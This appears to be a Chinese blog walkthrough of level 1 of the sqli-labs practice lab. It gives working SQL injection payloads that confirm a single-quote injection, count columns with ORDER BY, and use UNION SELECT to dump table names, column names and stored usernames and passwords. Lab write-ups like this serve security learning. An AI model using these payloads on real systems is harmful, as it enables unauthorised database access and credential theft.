sqlilabs通关——第一关

在这里插入图片描述
从上边的页面提示中可以看出,ID是其参数

1.判断漏洞

  1. 首先根据题目就可以知道这是一个单引号字符型注入漏洞
  2. 其次我们可以进行手工判断,输入id=1 and 1=2发现页面显示正常,说明肯定不是数字型,输入id=1'发现页面错误,但是有一个提示limit 0,1'说明后边的单引号没有闭合造成了错误,这就可以说明这是一个单引号引起的漏洞。输入id=1'--+页面正常。

2.漏洞利用

漏洞利用的思路和常规的MySQL一样,为了练习,这里使用手工注入。

  1. 判断字段数
    id=1' order by 3--+页面显示正常,id=1' order by 4--+页面显示错误,说明字段数为3
  2. 爆数字
    id=-1' union select 1,2,3--+页面爆出数字2 3
    在这里插入图片描述
  3. 爆表名
    id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
    在这里插入图片描述
  4. 爆列名
    id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
    在这里插入图片描述
  5. 爆数据
    id=-1' union select 1,username,password from users limit 1,1--+
    在这里插入图片描述
    通过limit m,1来实现全部数据的查询。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值